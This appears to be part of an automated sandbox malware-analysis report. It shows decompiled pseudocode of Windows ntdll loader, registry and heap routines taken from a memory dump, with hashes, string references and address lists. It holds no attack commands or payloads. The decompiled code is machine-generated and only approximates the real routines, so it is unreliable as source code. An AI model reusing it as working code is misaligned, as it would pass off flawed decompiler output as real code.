                        • Instruction ID: 3d52c6022c3da8379505f9a3a204a127ee55672e0e79a9dd449777d02ba41fc5
                        • Opcode Fuzzy Hash: 83a29893b7a568f921a667d819577879a0c390d0bcc4cbd39a80424138a11400
                        • Instruction Fuzzy Hash: 62014C32181250AEF329E7A8F50DF5277B8EB08F34F1D8869F5064F640CFA89484C524
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID: InitializeThunk
                        • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                        • API String ID: 2994545307-336120773
                        • Opcode ID: 9445b014b3521089d2abca571e5ecf957f8fbde28339290ffabaaf00e704d828
                        • Instruction ID: 44f6b797a770666be1acdb837e7ee7cfac13db1d815ce37bb1fc52a71e0f0ecb
                        • Opcode Fuzzy Hash: 9445b014b3521089d2abca571e5ecf957f8fbde28339290ffabaaf00e704d828
                        • Instruction Fuzzy Hash: 72316A31240510FFE712DB98C994FB773B9FF09B24F144495F516CB252DBB0A840DA68
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 83%
                        			E02B08794(void* __ecx) {
                        				signed int _v0;
                        				char _v8;
                        				signed int _v12;
                        				void* _v16;
                        				signed int _v20;
                        				intOrPtr _v24;
                        				signed int _v28;
                        				signed int _v32;
                        				signed int _v40;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				intOrPtr* _t77;
                        				signed int _t80;
                        				signed char _t81;
                        				signed int _t87;
                        				signed int _t91;
                        				void* _t92;
                        				void* _t94;
                        				signed int _t95;
                        				signed int _t103;
                        				signed int _t105;
                        				signed int _t110;
                        				signed int _t118;
                        				intOrPtr* _t121;
                        				intOrPtr _t122;
                        				signed int _t125;
                        				signed int _t129;
                        				signed int _t131;
                        				signed int _t134;
                        				signed int _t136;
                        				signed int _t143;
                        				signed int* _t147;
                        				signed int _t151;
                        				void* _t153;
                        				signed int* _t157;
                        				signed int _t159;
                        				signed int _t161;
                        				signed int _t166;
                        				signed int _t168;
                        
                        				_push(__ecx);
                        				_t153 = __ecx;
                        				_t159 = 0;
                        				_t121 = __ecx + 0x3c;
                        				if( *_t121 == 0) {
                        					L2:
                        					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                        					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                        						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                        						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                        						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                        							L6:
                        							if(E02B0934A() != 0) {
                        								_t159 = E02B7A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                        								__eflags = _t159;
                        								if(_t159 < 0) {
                        									_t81 =  *0x2be5780; // 0x0
                        									__eflags = _t81 & 0x00000003;
                        									if((_t81 & 0x00000003) != 0) {
                        										_push(_t159);
                        										E02B75510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                        										_t81 =  *0x2be5780; // 0x0
                        									}
                        									__eflags = _t81 & 0x00000010;
                        									if((_t81 & 0x00000010) != 0) {
                        										asm("int3");
                        									}
                        								}
                        							}
                        						} else {
                        							_t159 = E02B0849B(0, _t122, _t153, _t159, _t180);
                        							if(_t159 >= 0) {
                        								goto L6;
                        							}
                        						}
                        						_t80 = _t159;
                        						goto L8;
                        					} else {
                        						_t125 = 0x13;
                        						asm("int 0x29");
                        						_push(0);
                        						_push(_t159);
                        						_t161 = _t125;
                        						_t87 =  *( *[fs:0x30] + 0x1e8);
                        						_t143 = 0;
                        						_v40 = _t161;
                        						_t118 = 0;
                        						_push(_t153);
                        						__eflags = _t87;
                        						if(_t87 != 0) {
                        							_t118 = _t87 + 0x5d8;
                        							__eflags = _t118;
                        							if(_t118 == 0) {
                        								L46:
                        								_t118 = 0;
                        							} else {
                        								__eflags =  *(_t118 + 0x30);
                        								if( *(_t118 + 0x30) == 0) {
                        									goto L46;
                        								}
                        							}
                        						}
                        						_v32 = 0;
                        						_v28 = 0;
                        						_v16 = 0;
                        						_v20 = 0;
                        						_v12 = 0;
                        						__eflags = _t118;
                        						if(_t118 != 0) {
                        							__eflags = _t161;
                        							if(_t161 != 0) {
                        								__eflags =  *(_t118 + 8);
                        								if( *(_t118 + 8) == 0) {
                        									L22:
                        									_t143 = 1;
                        									__eflags = 1;
                        								} else {
                        									_t19 = _t118 + 0x40; // 0x40
                        									_t156 = _t19;
                        									E02B08999(_t19,  &_v16);
                        									__eflags = _v0;
                        									if(_v0 != 0) {
                        										__eflags = _v0 - 1;
                        										if(_v0 != 1) {
                        											goto L22;
                        										} else {
                        											_t128 =  *(_t161 + 0x64);
                        											__eflags =  *(_t161 + 0x64);
                        											if( *(_t161 + 0x64) == 0) {
                        												goto L22;
                        											} else {
                        												E02B08999(_t128,  &_v12);
                        												_t147 = _v12;
                        												_t91 = 0;
                        												__eflags = 0;
                        												_t129 =  *_t147;
                        												while(1) {
                        													__eflags =  *((intOrPtr*)(0x2be5c60 + _t91 * 8)) - _t129;
                        													if( *((intOrPtr*)(0x2be5c60 + _t91 * 8)) == _t129) {
                        														break;
                        													}
                        													_t91 = _t91 + 1;
                        													__eflags = _t91 - 5;
                        													if(_t91 < 5) {
                        														continue;
                        													} else {
                        														_t131 = 0;
                        														__eflags = 0;
                        													}
                        													L37:
                        													__eflags = _t131;
                        													if(_t131 != 0) {
                        														goto L22;
                        													} else {
                        														__eflags = _v16 - _t147;
                        														if(_v16 != _t147) {
                        															goto L22;
                        														} else {
                        															E02B12280(_t92, 0x2be86cc);
                        															_t94 = E02BC9DFB( &_v20);
                        															__eflags = _t94 - 1;
                        															if(_t94 != 1) {
                        															}
                        															asm("movsd");
                        															asm("movsd");
                        															asm("movsd");
                        															asm("movsd");
                        															 *_t118 =  *_t118 + 1;
                        															asm("adc dword [ebx+0x4], 0x0");
                        															_t95 = E02B261A0( &_v32);
                        															__eflags = _t95;
                        															if(_t95 != 0) {
                        																__eflags = _v32 | _v28;
                        																if((_v32 | _v28) != 0) {
                        																	_t71 = _t118 + 0x40; // 0x3f
                        																	_t134 = _t71;
                        																	goto L55;
                        																}
                        															}
                        															goto L30;
                        														}
                        													}
                        													goto L56;
                        												}
                        												_t92 = 0x2be5c64 + _t91 * 8;
                        												asm("lock xadd [eax], ecx");
                        												_t131 = (_t129 | 0xffffffff) - 1;
                        												goto L37;
                        											}
                        										}
                        										goto L56;
                        									} else {
                        										_t143 = E02B08A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                        										__eflags = _t143;
                        										if(_t143 != 0) {
                        											_t157 = _v12;
                        											_t103 = 0;
                        											__eflags = 0;
                        											_t136 =  &(_t157[1]);
                        											 *(_t161 + 0x64) = _t136;
                        											_t151 =  *_t157;
                        											_v20 = _t136;
                        											while(1) {
                        												__eflags =  *((intOrPtr*)(0x2be5c60 + _t103 * 8)) - _t151;
                        												if( *((intOrPtr*)(0x2be5c60 + _t103 * 8)) == _t151) {
                        													break;
                        												}
                        												_t103 = _t103 + 1;
                        												__eflags = _t103 - 5;
                        												if(_t103 < 5) {
                        													continue;
                        												}
                        												L21:
                        												_t105 = E02B3F380(_t136, 0x2ad1184, 0x10);
                        												__eflags = _t105;
                        												if(_t105 != 0) {
                        													__eflags =  *_t157 -  *_v16;
                        													if( *_t157 >=  *_v16) {
                        														goto L22;
                        													} else {
                        														asm("cdq");
                        														_t166 = _t157[5] & 0x0000ffff;
                        														_t108 = _t157[5] & 0x0000ffff;
                        														asm("cdq");
                        														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                        														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                        														if(__eflags > 0) {
                        															L29:
                        															E02B12280(_t108, 0x2be86cc);
                        															 *_t118 =  *_t118 + 1;
                        															_t42 = _t118 + 0x40; // 0x3f
                        															_t156 = _t42;
                        															asm("adc dword [ebx+0x4], 0x0");
                        															asm("movsd");
                        															asm("movsd");
                        															asm("movsd");
                        															asm("movsd");
                        															_t110 = E02B261A0( &_v32);
                        															__eflags = _t110;
                        															if(_t110 != 0) {
                        																__eflags = _v32 | _v28;
                        																if((_v32 | _v28) != 0) {
                        																	_t134 = _v20;
                        																	L55:
                        																	E02BC9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                        																}
                        															}
                        															L30:
                        															 *_t118 =  *_t118 + 1;
                        															asm("adc dword [ebx+0x4], 0x0");
                        															E02B0FFB0(_t118, _t156, 0x2be86cc);
                        															goto L22;
                        														} else {
                        															if(__eflags < 0) {
                        																goto L22;
                        															} else {
                        																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                        																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                        																	goto L22;
                        																} else {
                        																	goto L29;
                        																}
                        															}
                        														}
                        													}
                        													goto L56;
                        												}
                        												goto L22;
                        											}
                        											asm("lock inc dword [eax]");
                        											goto L21;
                        										}
                        									}
                        								}
                        							}
                        						}
                        						return _t143;
                        					}
                        				} else {
                        					_push( &_v8);
                        					_push( *((intOrPtr*)(__ecx + 0x50)));
                        					_push(__ecx + 0x40);
                        					_push(_t121);
                        					_push(0xffffffff);
                        					_t80 = E02B39A00();
                        					_t159 = _t80;
                        					if(_t159 < 0) {
                        						L8:
                        						return _t80;
                        					} else {
                        						goto L2;
                        					}
                        				}
                        				L56:
                        			}
                        0x02b088f3
                        0x02b088fc
                        0x02b08901
                        0x02b08906
                        0x02b0890c
                        0x02b0890c
                        0x02b0890f
                        0x02b08916
                        0x02b08917
                        0x02b08918
                        0x02b08919
                        0x02b0891a
                        0x02b0891f
                        0x02b08921
                        0x02b59c52
                        0x02b59c55
                        0x02b59c5b
                        0x02b59cac
                        0x02b59cc0
                        0x02b59cc0
                        0x02b59c55
                        0x02b08927
                        0x02b08927
                        0x02b0892f
                        0x02b08933
                        0x00000000
                        0x02b088f5
                        0x02b088f5
                        0x00000000
                        0x02b088f7
                        0x02b088f7
                        0x02b088fa
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b088fa
                        0x02b088f5
                        0x02b088f3
                        0x00000000
                        0x02b088d5
                        0x00000000
                        0x02b088b2
                        0x02b088c9
                        0x00000000
                        0x02b088c9
                        0x02b0887f
                        0x02b0886a
                        0x02b08857
                        0x02b08852
                        0x02b088bf
                        0x02b088bf
                        0x02b087aa
                        0x02b087ad
                        0x02b087ae
                        0x02b087b4
                        0x02b087b5
                        0x02b087b6
                        0x02b087b8
                        0x02b087bd
                        0x02b087c1
                        0x02b087f4
                        0x02b087fa
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b087c1
                        0x00000000

                        Strings
                        • LdrpDoPostSnapWork, xrefs: 02B59C1E
                        • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 02B59C18
                        • minkernel\ntdll\ldrsnap.c, xrefs: 02B59C28
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                        • API String ID: 0-1948996284
                        • Opcode ID: c5eec6b06e8d47dff613a86798cb0239159dddc315c76fa0851cbc16b329766f
                        • Instruction ID: bbe69fe17fa04d87f16cefe53e70c335eca1fd6829f94b08f09949221af1b2b0
                        • Opcode Fuzzy Hash: c5eec6b06e8d47dff613a86798cb0239159dddc315c76fa0851cbc16b329766f
                        • Instruction Fuzzy Hash: 5D91D271A00715EBEF1ADF58C4C1ABA7BB6FF44318B5441E9D905AB291DB30FA01CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 98%
                        			E02B07E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                        				char _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				char _v24;
                        				signed int _t73;
                        				void* _t77;
                        				char* _t82;
                        				char* _t87;
                        				signed char* _t97;
                        				signed char _t102;
                        				intOrPtr _t107;
                        				signed char* _t108;
                        				intOrPtr _t112;
                        				intOrPtr _t124;
                        				intOrPtr _t125;
                        				intOrPtr _t126;
                        
                        				_t107 = __edx;
                        				_v12 = __ecx;
                        				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                        				_t124 = 0;
                        				_v20 = __edx;
                        				if(E02B0CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                        					_t112 = _v8;
                        				} else {
                        					_t112 = 0;
                        					_v8 = 0;
                        				}
                        				if(_t112 != 0) {
                        					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                        						_t124 = 0xc000007b;
                        						goto L8;
                        					}
                        					_t73 =  *(_t125 + 0x34) | 0x00400000;
                        					 *(_t125 + 0x34) = _t73;
                        					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                        						goto L3;
                        					}
                        					 *(_t125 + 0x34) = _t73 | 0x01000000;
                        					_t124 = E02AFC9A4( *((intOrPtr*)(_t125 + 0x18)));
                        					if(_t124 < 0) {
                        						goto L8;
                        					} else {
                        						goto L3;
                        					}
                        				} else {
                        					L3:
                        					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                        						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                        						L8:
                        						return _t124;
                        					}
                        					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                        						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                        							goto L5;
                        						}
                        						_t102 =  *0x2be5780; // 0x0
                        						if((_t102 & 0x00000003) != 0) {
                        							E02B75510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                        							_t102 =  *0x2be5780; // 0x0
                        						}
                        						if((_t102 & 0x00000010) != 0) {
                        							asm("int3");
                        						}
                        						_t124 = 0xc0000428;
                        						goto L8;
                        					}
                        					L5:
                        					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                        						goto L8;
                        					}
                        					_t77 = _a4 - 0x40000003;
                        					if(_t77 == 0 || _t77 == 0x33) {
                        						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                        						if(E02B17D50() != 0) {
                        							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        						} else {
                        							_t82 = 0x7ffe0384;
                        						}
                        						_t108 = 0x7ffe0385;
                        						if( *_t82 != 0) {
                        							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                        								if(E02B17D50() == 0) {
                        									_t97 = 0x7ffe0385;
                        								} else {
                        									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                        								}
                        								if(( *_t97 & 0x00000020) != 0) {
                        									E02B77016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                        								}
                        							}
                        						}
                        						if(_a4 != 0x40000003) {
                        							L14:
                        							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                        							if(E02B17D50() != 0) {
                        								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        							} else {
                        								_t87 = 0x7ffe0384;
                        							}
                        							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                        								if(E02B17D50() != 0) {
                        									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                        								}
                        								if(( *_t108 & 0x00000020) != 0) {
                        									E02B77016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                        								}
                        							}
                        							goto L8;
                        						} else {
                        							_v16 = _t125 + 0x24;
                        							_t124 = E02B2A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                        							if(_t124 < 0) {
                        								E02AFB1E1(_t124, 0x1490, 0, _v16);
                        								goto L8;
                        							}
                        							goto L14;
                        						}
                        					} else {
                        						goto L8;
                        					}
                        				}
                        			}

                        Strings
                        • Could not validate the crypto signature for DLL %wZ, xrefs: 02B59891
                        • LdrpCompleteMapModule, xrefs: 02B59898
                        • minkernel\ntdll\ldrmap.c, xrefs: 02B598A2
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                        • API String ID: 0-1676968949
                        • Opcode ID: 33f727b8e7cf18d230f8348dc19eb9567424416fef52475cba03cf47eaf4d32e
                        • Instruction ID: fccadb4ad2a3b6c7b1a9191d6c196fd15f08c8ccbee5cbcd19824b0acc204813
                        • Opcode Fuzzy Hash: 33f727b8e7cf18d230f8348dc19eb9567424416fef52475cba03cf47eaf4d32e
                        • Instruction Fuzzy Hash: 1151E131601B85DBEB22CB58C984B2AFBA9EB01358F1405D9E9529F7D1DB74FD00DB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 93%
                        			E02AFE620(void* __ecx, short* __edx, short* _a4) {
                        				char _v16;
                        				char _v20;
                        				intOrPtr _v24;
                        				char* _v28;
                        				char _v32;
                        				char _v36;
                        				char _v44;
                        				signed int _v48;
                        				intOrPtr _v52;
                        				void* _v56;
                        				void* _v60;
                        				char _v64;
                        				void* _v68;
                        				void* _v76;
                        				void* _v84;
                        				signed int _t59;
                        				signed int _t74;
                        				signed short* _t75;
                        				signed int _t76;
                        				signed short* _t78;
                        				signed int _t83;
                        				short* _t93;
                        				signed short* _t94;
                        				short* _t96;
                        				void* _t97;
                        				signed int _t99;
                        				void* _t101;
                        				void* _t102;
                        
                        				_t80 = __ecx;
                        				_t101 = (_t99 & 0xfffffff8) - 0x34;
                        				_t96 = __edx;
                        				_v44 = __edx;
                        				_t78 = 0;
                        				_v56 = 0;
                        				if(__ecx == 0 || __edx == 0) {
                        					L28:
                        					_t97 = 0xc000000d;
                        				} else {
                        					_t93 = _a4;
                        					if(_t93 == 0) {
                        						goto L28;
                        					}
                        					_t78 = E02AFF358(__ecx, 0xac);
                        					if(_t78 == 0) {
                        						_t97 = 0xc0000017;
                        						L6:
                        						if(_v56 != 0) {
                        							_push(_v56);
                        							E02B395D0();
                        						}
                        						if(_t78 != 0) {
                        							L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                        						}
                        						return _t97;
                        					}
                        					E02B3FA60(_t78, 0, 0x158);
                        					_v48 = _v48 & 0x00000000;
                        					_t102 = _t101 + 0xc;
                        					 *_t96 = 0;
                        					 *_t93 = 0;
                        					E02B3BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                        					_v36 = 0x18;
                        					_v28 =  &_v44;
                        					_v64 = 0;
                        					_push( &_v36);
                        					_push(0x20019);
                        					_v32 = 0;
                        					_push( &_v64);
                        					_v24 = 0x40;
                        					_v20 = 0;
                        					_v16 = 0;
                        					_t97 = E02B39600();
                        					if(_t97 < 0) {
                        						goto L6;
                        					}
                        					E02B3BB40(0,  &_v36, L"InstallLanguageFallback");
                        					_push(0);
                        					_v48 = 4;
                        					_t97 = L02AFF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                        					if(_t97 >= 0) {
                        						if(_v52 != 1) {
                        							L17:
                        							_t97 = 0xc0000001;
                        							goto L6;
                        						}
                        						_t59 =  *_t78 & 0x0000ffff;
                        						_t94 = _t78;
                        						_t83 = _t59;
                        						if(_t59 == 0) {
                        							L19:
                        							if(_t83 == 0) {
                        								L23:
                        								E02B3BB40(_t83, _t102 + 0x24, _t78);
                        								if(L02B043C0( &_v48,  &_v64) == 0) {
                        									goto L17;
                        								}
                        								_t84 = _v48;
                        								 *_v48 = _v56;
                        								if( *_t94 != 0) {
                        									E02B3BB40(_t84, _t102 + 0x24, _t94);
                        									if(L02B043C0( &_v48,  &_v64) != 0) {
                        										 *_a4 = _v56;
                        									} else {
                        										_t97 = 0xc0000001;
                        										 *_v48 = 0;
                        									}
                        								}
                        								goto L6;
                        							}
                        							_t83 = _t83 & 0x0000ffff;
                        							while(_t83 == 0x20) {
                        								_t94 =  &(_t94[1]);
                        								_t74 =  *_t94 & 0x0000ffff;
                        								_t83 = _t74;
                        								if(_t74 != 0) {
                        									continue;
                        								}
                        								goto L23;
                        							}
                        							goto L23;
                        						} else {
                        							goto L14;
                        						}
                        						while(1) {
                        							L14:
                        							_t27 =  &(_t94[1]); // 0x2
                        							_t75 = _t27;
                        							if(_t83 == 0x2c) {
                        								break;
                        							}
                        							_t94 = _t75;
                        							_t76 =  *_t94 & 0x0000ffff;
                        							_t83 = _t76;
                        							if(_t76 != 0) {
                        								continue;
                        							}
                        							goto L23;
                        						}
                        						 *_t94 = 0;
                        						_t94 = _t75;
                        						_t83 =  *_t75 & 0x0000ffff;
                        						goto L19;
                        					}
                        				}
                        			}

                        Strings
                        • InstallLanguageFallback, xrefs: 02AFE6DB
                        • @, xrefs: 02AFE6C0
                        • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 02AFE68C
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                        • API String ID: 0-1757540487
                        • Opcode ID: 96b600fcae01c0dfcd980f9216998e3bc84b8b919938575e7228e6f4e96d0fca
                        • Instruction ID: 4734b0e6796434dd25682dd24626e772d4932cc8509ed6b6e0b547a077f647db
                        • Opcode Fuzzy Hash: 96b600fcae01c0dfcd980f9216998e3bc84b8b919938575e7228e6f4e96d0fca
                        • Instruction Fuzzy Hash: 8351B1725043559BC725DF64C440BABB3E8EF88715F4509AEFA85EB250FB34D904CBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 60%
                        			E02BBE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                        				signed int _v20;
                        				char _v24;
                        				signed int _v40;
                        				char _v44;
                        				intOrPtr _v48;
                        				signed int _v52;
                        				unsigned int _v56;
                        				char _v60;
                        				signed int _v64;
                        				char _v68;
                        				signed int _v72;
                        				void* __ebx;
                        				void* __edi;
                        				char _t87;
                        				signed int _t90;
                        				signed int _t94;
                        				signed int _t100;
                        				intOrPtr* _t113;
                        				signed int _t122;
                        				void* _t132;
                        				void* _t135;
                        				signed int _t139;
                        				signed int* _t141;
                        				signed int _t146;
                        				signed int _t147;
                        				void* _t153;
                        				signed int _t155;
                        				signed int _t159;
                        				char _t166;
                        				void* _t172;
                        				void* _t176;
                        				signed int _t177;
                        				intOrPtr* _t179;
                        
                        				_t179 = __ecx;
                        				_v48 = __edx;
                        				_v68 = 0;
                        				_v72 = 0;
                        				_push(__ecx[1]);
                        				_push( *__ecx);
                        				_push(0);
                        				_t153 = 0x14;
                        				_t135 = _t153;
                        				_t132 = E02BBBBBB(_t135, _t153);
                        				if(_t132 == 0) {
                        					_t166 = _v68;
                        					goto L43;
                        				} else {
                        					_t155 = 0;
                        					_v52 = 0;
                        					asm("stosd");
                        					asm("stosd");
                        					asm("stosd");
                        					asm("stosd");
                        					asm("stosd");
                        					_v56 = __ecx[1];
                        					if( *__ecx >> 8 < 2) {
                        						_t155 = 1;
                        						_v52 = 1;
                        					}
                        					_t139 = _a4;
                        					_t87 = (_t155 << 0xc) + _t139;
                        					_v60 = _t87;
                        					if(_t87 < _t139) {
                        						L11:
                        						_t166 = _v68;
                        						L12:
                        						if(_t132 != 0) {
                        							E02BBBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                        						}
                        						L43:
                        						if(_v72 != 0) {
                        							_push( *((intOrPtr*)(_t179 + 4)));
                        							_push( *_t179);
                        							_push(0x8000);
                        							E02BBAFDE( &_v72,  &_v60);
                        						}
                        						L46:
                        						return _t166;
                        					}
                        					_t90 =  *(_t179 + 0xc) & 0x40000000;
                        					asm("sbb edi, edi");
                        					_t172 = ( ~_t90 & 0x0000003c) + 4;
                        					if(_t90 != 0) {
                        						_push(0);
                        						_push(0x14);
                        						_push( &_v44);
                        						_push(3);
                        						_push(_t179);
                        						_push(0xffffffff);
                        						if(E02B39730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                        							_push(_t139);
                        							E02BBA80D(_t179, 1, _v40, 0);
                        							_t172 = 4;
                        						}
                        					}
                        					_t141 =  &_v72;
                        					if(E02BBA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                        						_v64 = _a4;
                        						_t94 =  *(_t179 + 0xc) & 0x40000000;
                        						asm("sbb edi, edi");
                        						_t176 = ( ~_t94 & 0x0000003c) + 4;
                        						if(_t94 != 0) {
                        							_push(0);
                        							_push(0x14);
                        							_push( &_v24);
                        							_push(3);
                        							_push(_t179);
                        							_push(0xffffffff);
                        							if(E02B39730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                        								_push(_t141);
                        								E02BBA80D(_t179, 1, _v20, 0);
                        								_t176 = 4;
                        							}
                        						}
                        						if(E02BBA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                        							goto L11;
                        						} else {
                        							_t177 = _v64;
                        							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                        							_t100 = _v52 + _v52;
                        							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                        							 *(_t132 + 0x10) = _t146;
                        							asm("bsf eax, [esp+0x18]");
                        							_v52 = _t100;
                        							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                        							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                        							_t47 =  &_a8;
                        							 *_t47 = _a8 & 0x00000001;
                        							if( *_t47 == 0) {
                        								E02B12280(_t179 + 0x30, _t179 + 0x30);
                        							}
                        							_t147 =  *(_t179 + 0x34);
                        							_t159 =  *(_t179 + 0x38) & 1;
                        							_v68 = 0;
                        							if(_t147 == 0) {
                        								L35:
                        								E02B0B090(_t179 + 0x34, _t147, _v68, _t132);
                        								if(_a8 == 0) {
                        									E02B0FFB0(_t132, _t177, _t179 + 0x30);
                        								}
                        								asm("lock xadd [eax], ecx");
                        								asm("lock xadd [eax], edx");
                        								_t132 = 0;
                        								_v72 = _v72 & 0;
                        								_v68 = _v72;
                        								if(E02B17D50() == 0) {
                        									_t113 = 0x7ffe0388;
                        								} else {
                        									_t177 = _v64;
                        									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        								}
                        								if( *_t113 == _t132) {
                        									_t166 = _v68;
                        									goto L46;
                        								} else {
                        									_t166 = _v68;
                        									E02BAFEC0(_t132, _t179, _t166, _t177 + 0x1000);
                        									goto L12;
                        								}
                        							} else {
                        								L23:
                        								while(1) {
                        									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                        										_t122 =  *_t147;
                        										if(_t159 == 0) {
                        											L32:
                        											if(_t122 == 0) {
                        												L34:
                        												_v68 = 0;
                        												goto L35;
                        											}
                        											L33:
                        											_t147 = _t122;
                        											continue;
                        										}
                        										if(_t122 == 0) {
                        											goto L34;
                        										}
                        										_t122 = _t122 ^ _t147;
                        										goto L32;
                        									}
                        									_t122 =  *(_t147 + 4);
                        									if(_t159 == 0) {
                        										L27:
                        										if(_t122 != 0) {
                        											goto L33;
                        										}
                        										L28:
                        										_v68 = 1;
                        										goto L35;
                        									}
                        									if(_t122 == 0) {
                        										goto L28;
                        									}
                        									_t122 = _t122 ^ _t147;
                        									goto L27;
                        								}
                        							}
                        						}
                        					}
                        					_v72 = _v72 & 0x00000000;
                        					goto L11;
                        				}
                        			}


                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
